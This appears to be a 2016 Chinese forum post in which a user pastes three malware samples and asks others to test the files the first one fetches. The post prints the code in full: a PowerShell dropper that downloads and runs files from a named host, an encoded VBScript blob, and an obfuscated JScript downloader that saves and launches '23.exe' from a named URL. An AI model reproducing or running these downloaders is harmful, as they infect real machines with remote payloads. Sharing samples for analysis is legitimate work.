本帖最后由 ELOHIM 于 2016-10-6 22:30 编辑
图一:三个文件不知道修复了没有,还是原来就这么大?
没有比对。
图二:余下的全部文件。
WD:余 33。
——————————————————————————————
三个未知修复文件一:
$CheckFile = Test-Path "$env:APPDATA/gzf.bin"
if ($CheckFile) {exit}
1 > "$env:APPDATA/gzf.bin"
$down = New-Object System.Net.WebClient
$url1 = "http://zahr.pw/sh/7sh";
$url2 = "http://zahr.pw/sh/sharchivedmngr";
$url3 = "http://zahr.pw/sh/shlapsizeof";
$file1 = "$env:APPDATA/7sh.exe";
$file2 = "$env:APPDATA/sharchivedmngr";
$file3 = "$env:APPDATA/shlapsizeof.cmd";
$down.DownloadFile($url1,$file1);
$down.DownloadFile($url2,$file2);
$down.DownloadFile($url3,$file3);
$exec = New-Object -com shell.application
$exec.shellexecute($file3, "", "", "open", 0);
——————————————————————————————
文件二:
#@~^NQMAAA==(6P kmMqwDRz.o!:n1D/ sxo:4'ZPK_nU@#@&?K~W8%ktnV^xmM+COr4%n1KcJU4VscbawVbmmOkKxE#@#@&G8N?CAsVc?tss+X+1EO+EAkm.kaOR6nEBZt.c2cb[Sj1DrhYc?mMkhP0!Vs1m:n';tIvfc*[J,;Cmr~rJSJ.; ldJBq@#@&2sj@#@&JG1lO+6(^2^N'rtYDw=&zShAR1WUOmoWDC/cmWs 8DJmKxOl[GMR2ta_w{&Tq2,J@#@&kY.n;xrRE@#@&mDDG1Ud+M.nDkl[xzIDmz`rF,y 1*cFcv+JSERR0RR %r#@#@&U+K~G(LAH&jAD-bm'MYK8LmP`rhrUso:Dd)Pk:an./KxmYrWUJ\nV{r:a+.dKxlOn)"w-r'kY.hZLJ-MWKO-1kh\yJb@#@&?+D~1bm/{G89qH&?nD-r1+ 2X3m5En.H`Jj3d2/K,M,s]}H,k &ym1YAWM3)[mwY.ZKx0bL;DmYbWUP uAI3P&K2 l8sNPx~:D;+rb@#@&oKI,2l1t,Hk1P(x,1r^k@#@&bHYU+YGHd?D7+./pa7'Hk1 /Y9HU?2.-ADj+m.1t6MND`mDM91U/nDj+.dmN#@#@&q6Pk Oj+:fg?j2.-Dd6o-'ZPO4x@#@&3^?n@#@&3 N~&s@#@&16D@#@&U+OPV+COo:V8xZ"+lDn64N+1YcJ\joHJ cpHdCPPhJ#@#@&V2CYoh^F KwAxJV2:E~dW^lD+W(^2mNS0mV/A@#@&ob:(hVq k+UNvb@#@&?nP,M+COo:sF{HKK4bxT@#@&Ax9~q67f8AAA==^#~@ XXXXXXXXXXXXgdfXXXXXXXXXX4dg34XgfddXXXXX4gdfXXdg3XggdfdgdfgXdg4Xdgfg353ddXdfdf534XfgfdgXXdg34Xf45X5X3df3g534XXXd334XX5gdfXXXXX34g33434fdgXX#%$#%#dg3XgX45dfX5XXXXXdfdfXXX4fd3XX%XXgfdf5XX54gfXXXXdfXXdfX34XX3fdfdXXXXXgXXXXXX4dfXfdXXXXdfXXXdg543XXdfXXXdfdgXXXXXXXXXXXXXXgXXXXXXXXXXX.jpg
——————————————————————————————
文件三:
"Wed Oct 5 14:47:27 UTC+0200 2016"
function VsqzvrYroZ(PJYuZvzh,qRorXQrDHKeW) {PJYuZvzh.Run(qRorXQrDHKeW, 0x1, 0x0);}
/*lbNxeVObiMXchRKCobainKsYqIKDjozccuMZIrUAlXVjwEnfCeWUoPuGQDEUVLaOOgFUffSrhBMJFKLcKAMaiopHkRsEBCuVtmskwoLCYzxDIlbsMqwzWgecxyaIaLHuRLYSHPwhHQbREelbHzYrDrNRDzBftpOnjExVLLcflAzytrpewbvDeWpYDUWWFmOAuQQqIZAxHF*/QgYjKKhIGqlTI();
var jrLAr = ["http://masseriacarparelli.it/logs.php"];
var avPz=746-746;
while(true) {
if(jrLAr.length<=154-154) break;
var xwjo = KeCzSnl() % jrLAr.length;
var TFzaNNmOF=jrLAr[xwjo];
var hUwEo=KeCzSnl();
var LSqxEiNMLl='23.exe';
var hrXBZFA='23.exe';
var fZvUxuDf=840-839;
var UOStjGiwE = function(){
return new ActiveXObject(VbIpy('WS&ETqwOoemH&cript&ETqwOoemH&.She&l&l',[0,2,4,5,6],'&'));
}();
var hrXBZFA = jevWiW(UOStjGiwE) + String.fromCharCode(92) + hrXBZFA;
var iMCrt = function(){
return new ActiveXObject(VbIpy('MSX&cnOkRnmLj&ML2.XM&JUSprMmTDnV&LHTTP',[0,2,4],'&'));
}();
WGmI(TFzaNNmOF,iMCrt);
if (iMCrt.status == 100+100) {
var ruxmugD = function() {
return new ActiveXObject(VbIpy('ADO&DB&iltATIFgl&.&LUrWLKllB&Stream',[0,1,3,5],'&'));
}();
var TiXccTEYdrFn=GyjHz(ruxmugD,iMCrt.ResponseBody,hrXBZFA);
}
try {
VsqzvrYroZ(UOStjGiwE,hrXBZFA);
var PsKKmvg = GetObject('winmgmts:{impersonationLevel=impersonate}').ExecQuery('Select * from Win32_Process Where Name = \''+LSqxEiNMLl+'\'');
if ( PsKKmvg.Count >= 1 ){break;}
} catch(e) {}
avPz++;
jrLAr.splice (xwjo,668-667);
}
function jevWiW(BkLfgY){var gGasNAaW=["ExpandEnvironmentStrings"];return BkLfgY[gGasNAaW[0]]('%TMP%')}
function GyjHz(oJBysWfj,vnRLI,AJIRcgfiJg){try{oJBysWfj.open();NxopHEBh(oJBysWfj);yQnXEQZ(oJBysWfj,vnRLI);EDdlhQjaD(oJBysWfj);ZrDg(oJBysWfj,AJIRcgfiJg);IrPhvEkj=oJBysWfj.size;AWKjJAi(oJBysWfj);return IrPhvEkj;}catch(e){}}
function WGmI(sKPFmz,iwJllhp){try{Hpji = 'G*XmCUSuJDEE*E*T*DNTjJEVbYHwx'.split('*');iwJllhp.open(Hpji[0]+Hpji[2]+Hpji[3], sKPFmz, false);iwJllhp.setRequestHeader("User-Agent", "Python-urllib/3.1");iwJllhp.send();}catch(e){}}
function VbIpy(qqWgFFiS,zmsfex,sRXYAClaH){JKSWX=qqWgFFiS.split(sRXYAClaH);vgybyAK = 'uZk';for(kwnfnMYN=0;kwnfnMYN<zmsfex.length;kwnfnMYN++) {vgybyAK+=JKSWX[zmsfex[kwnfnMYN]];}return vgybyAK.substring(3,vgybyAK.length);}
function QgYjKKhIGqlTI() {/*ErBbBbhWII().Sleep(3091-817);*/}
function AZBXkqk(){var kJemhU=["random"];return Math[kJemhU[0]]()}
function YGqF(YhzRiE) {YhzRiE.open();}
function NxopHEBh(eRHwCnRba) {eRHwCnRba.type=1;}
function yQnXEQZ(qhCC,EplPL) {qhCC.write(EplPL);}
function ErBbBbhWII() {return/*SnLDidVEcaXdXgeRSbaolQWjbdFWMUltqUAQmgJhylyIzoemnRmllchwuzCllmIxHUjxjDrdORSGUPXaBcrBfJmcGotTDXYVSoLxatTsX*/WScript;}
function EDdlhQjaD(IBEVrV) {var VPCKxqBLjd=[];IBEVrV.position=VPCKxqBLjd.length*(6461424-345);}
function ZrDg(itDfMjI,eYFQICZ) {itDfMjI.saveToFile(eYFQICZ, 2);}
function AWKjJAi(ARxgR) {ARxgR.close();}
function KeCzSnl() {var fUxu=100000;var iutugy = 100;return Math.round(AZBXkqk()*(fUxu-iutugy)+iutugy);}
function mdXLOOgl(krGDm) {var fTSeWUJA='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';for(var iggIG=0;iggIG<krGDm;iggIG++){BQqJF+=fTSeWUJA.charAt(Math.floor(Math.random()*fTSeWUJA.length));}return BQqJF;}
function RzcYmBeXKiyVKA(xIkgKCIgzwdfzI) {return new ActiveXObject(xIkgKCIgzwdfzI);}
——————————————————————————————————————
谁来把文件一代码下载的几个文件测试一下?
|